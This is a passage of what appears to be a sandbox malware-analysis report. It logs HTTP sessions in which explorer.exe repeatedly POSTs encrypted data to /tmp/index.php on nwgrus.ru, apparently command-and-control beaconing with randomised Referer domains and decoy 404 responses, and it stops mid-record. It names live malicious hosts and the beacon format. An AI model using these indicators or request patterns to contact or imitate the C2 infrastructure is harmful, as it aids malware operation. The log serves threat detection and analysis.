                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    32192.168.2.44987378.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:13.552712917 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wdfbqkdpkrjmiy.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 136
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:13.552731037 CEST136OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 15 6b 2c 90 f5 76 0b 75 70 44 ee f1
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[k,vupD}FxPhRIf8b/U`]|Y4y
                                    Oct 13, 2024 17:03:14.796607971 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:14 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    33192.168.2.44988278.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:14.806333065 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://atckbbeeuxiymh.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 308
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:14.808027029 CEST308OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2a 6b 2c 90 f5 76 0b 75 59 3a e0 ba
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[*k,vuY:ACStt})}5:Rf{0&<G2TW|C]+<`5^LUl~E)PH<,x7d%KnWj,[Gp
                                    Oct 13, 2024 17:03:15.976577044 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:15 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    34192.168.2.44989078.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:15.985131979 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://cijofmhyocrj.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 308
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:15.985166073 CEST308OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 2b 6b 2c 90 f5 76 0b 75 6f 38 d5 e5
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[+k,vuo8Y6kdD! N_}|n4[/!T^\XFBDQd-LeZ,>w]SRFB aqdq^yhXs[C
                                    Oct 13, 2024 17:03:17.243900061 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:16 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    35192.168.2.44989678.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:03:17.252623081 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://mvcnjjhpwrjug.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 135
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:03:17.252645016 CEST135OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 28 6b 2c 90 f5 76 0b 75 55 06 aa 9e
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA -[(k,vuUtXoS~tMqxCz~{=kY_
                                    Oct 13, 2024 17:03:18.610971928 CEST484INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:03:18 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    36192.168.2.45003878.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:04:26.627563000 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gjrfgywovwumgreo.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 274
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:04:26.627563000 CEST274OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 34 49 dd 92
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu4Iy{Bk>ZG:;Kt#h_"P^G]CSk,3};81p^:|ySX(GC"JERIlbz;EYW
                                    Oct 13, 2024 17:04:28.029043913 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:04:27 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    37192.168.2.45003978.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:04:32.911271095 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://duklicrioxv.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 156
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:04:32.911271095 CEST156OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 41 0c ef e5
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuAi0z\<eR(=FD*dLJ\5Vo*uFs
                                    Oct 13, 2024 17:04:34.140043020 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:04:33 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    38192.168.2.45004078.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:04:38.182934999 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ukjjgoqtxsrmcmnl.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 362
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:04:38.182967901 CEST362OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3b 5a bb e1
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu;Z}#\fe,X@%4[GcbH8;^$cyM'zn_V3J,"eBy-W<?t!lq_pD~gJCUw
                                    Oct 13, 2024 17:04:39.391208887 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:04:39 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    39192.168.2.45004178.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:04:43.323587894 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://kevwooyenkvj.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 307
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:04:43.326654911 CEST307OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 77 29 b8 ad
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuw)\@YeHH[,$Pp-ETJNv695$Q:WMM\VW%@b@P]<{kvt$$'$
                                    Oct 13, 2024 17:04:44.509438038 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:04:44 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    40192.168.2.45004278.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:04:48.787045002 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://kyqpufsslxgu.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 215
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:04:48.787079096 CEST215OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 06 b2 82
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vu2S"jd[_"|E,z?;2UTvy%=0PS9((|j6|6}"XZ(:0^T7
                                    Oct 13, 2024 17:04:50.069689035 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:04:49 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    41192.168.2.45004378.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:04:54.553349972 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://gtfiwdiocoxv.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 132
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:04:54.553381920 CEST132OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 49 1e ec 8b
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuI5Qr>r;6a{a>~nx
                                    Oct 13, 2024 17:04:55.759946108 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:04:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    42192.168.2.45004478.89.199.216802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:00.282948971 CEST279OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wtloyxdgfedr.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 298
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:00.282968998 CEST298OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7f 56 fc f7
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuV9mmv9@X*bjBXyzq/XDLW=[leM6s-.%q@],IU.PA~7/x-g,D1
                                    Oct 13, 2024 17:05:01.475089073 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:01 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    43192.168.2.450045109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:06.197248936 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://jrasjcgaikr.com/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 214
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:06.197290897 CEST214OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 07 c9 a1
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuC%jpvh{OLIo;0@BG0S?-9+_C]K.Q7-(j]Vgj6,.;
                                    Oct 13, 2024 17:05:06.985910892 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:06 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    44192.168.2.450046109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:10.841243029 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://wqumsknhwrx.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 323
                                    Host: nwgrus.ru
                                    Oct 13, 2024 17:05:10.841335058 CEST323OUTData Raw: 3b 6e 50 17 f1 ca 68 25 d7 d8 c1 0a 0f 05 7f bd 0d 0a c1 e7 63 02 95 10 0e 75 7b 90 33 b0 ce 6f ed 2d c6 2f 76 6a 24 6d ee 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 52 20 ba fa
                                    Data Ascii: ;nPh%cu{3o-/vj$m? 9Yt M@NA .[k,vuR i_y"mWN3O4R}`K@+<FY'C ]U ,G7/00Atki^;K$
                                    Oct 13, 2024 17:05:11.639252901 CEST151INHTTP/1.1 404 Not Found
                                    Server: nginx/1.26.0
                                    Date: Sun, 13 Oct 2024 15:05:11 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Connection: close
                                    Data Raw: 03 00 00 00 72 e8 84
                                    Data Ascii: r


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    45192.168.2.450047109.175.29.39802580C:\Windows\explorer.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 13, 2024 17:05:15.990360975 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://uqdrqkhpcmcglann.net/
